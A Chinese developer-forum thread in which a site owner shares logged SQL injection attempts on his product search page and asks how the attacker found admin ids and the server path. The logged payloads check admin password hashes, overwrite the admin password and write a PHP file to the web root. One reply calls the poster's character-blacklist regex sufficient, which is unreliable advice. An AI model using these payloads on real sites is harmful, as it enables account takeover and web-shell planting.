sql注入问题

啾啾我 2016-03-19 09:30:44

错误URL地址 : /product/default.aspx
错误时间 : 2016-03-18 22:11:53
错误:鸡缸杯%'and (select count(*) from admin where id=3 and password='268C0C9BC21B1207A84F553B11E372E8')=1 and '%'='

**************************************************************************************
错误URL地址 : /product/default.aspx
错误时间 : 2016-03-18 22:12:00
错误:鸡缸杯%'and (select count(*) from admin where id=3 and password='168C0C9BC21B1207A84F553B11E372E8')=1 and '%'='

**************************************************************************************
错误URL地址 : /product/default.aspx
错误时间 : 2016-03-18 22:12:24
错误:鸡缸杯%'and (select count(*) from admin where id=120 and password='B3E1B96D0A042ED33AE27D54C68C8FC4')=1 and '%'='

**************************************************************************************
错误URL地址 : /view/default.aspx
错误时间 : 2016-03-18 22:12:59
错误:鸡缸杯%'; update admin set password='268C0C9BC21B1207A84F553B11E372E8' where id=120;--

**************************************************************************************
错误URL地址 : /product/default.aspx
错误时间 : 2016-03-18 22:13:43
错误:鸡缸杯%'; update admin set password='B3E1B96D0A042ED33AE27D54C68C8FC4' where id=120;--

**************************************************************************************

错误URL地址 : /product/default.aspx
错误时间 : 2016-03-18 22:13:52
错误:鸡缸杯%'and (select count(*) from admin where id=120 and password='B3E1B96D0A042ED33AE27D54C68C8FC4')=1 and '%'='

**************************************************************************************
错误URL地址 : /product/default.aspx
错误时间 : 2016-03-18 22:19:42
错误:鸡缸杯%'; select 'aaa' into outfile 'd:\wwwroot\web\test.php';--

**************************************************************************************


这个是我前几天通过错误日志记录的用户输入的信息,当然我后台有一个正则过滤一些特殊字符

if (Regex.IsMatch(value, @"[|;|\.|,|\/||||\}|\{|%|@|\*|!|\']"))

他这些sql注入都是通过一个网页产品搜索功能尝试的。例如product/?value='输入的查询字符串' 后台直接验证like%查询

我想不明白的是他怎么知道我的数据库中id有120,3的数据,还有他怎么知道我的虚拟路径d:\wwwroot\web\这个的,是自己尝试的还是通过其他方式获得的。
...全文
177 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
中国风 2016-03-19
  • 打赏
  • 举报
回复
SQL注入专题--整理帖 http://bbs.csdn.net/topics/290032853
啾啾我 2016-03-19
  • 打赏
  • 举报
回复
引用 3 楼 ap0405140 的回复:
应该可以.
我想不明白的是他怎么知道我的数据库中id有120,3的数据,还有他怎么知道我的虚拟路径d:\wwwroot\web\这个的,是自己尝试的还是通过其他方式获得的。
唐诗三百首 2016-03-19
  • 打赏
  • 举报
回复
引用 2 楼 sossos555 的回复:
我后台使用正则过滤掉一些字符能够解决这问题吗?我的查询不是拼接的sql,都是是参数化查询
应该可以.
啾啾我 2016-03-19
  • 打赏
  • 举报
回复
引用 1 楼 ap0405140 的回复:
建议把SQL封装为存储过程,前端程序调用存储过程输入参数即可.
我后台使用正则过滤掉一些字符能够解决这问题吗?我的查询不是拼接的sql,都是是参数化查询
唐诗三百首 2016-03-19
  • 打赏
  • 举报
回复
建议把SQL封装为存储过程,前端程序调用存储过程输入参数即可.

590

社区成员

发帖
与我相关
我的任务
社区描述
提出问题
其他 技术论坛(原bbs)
社区管理员
  • community_281
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧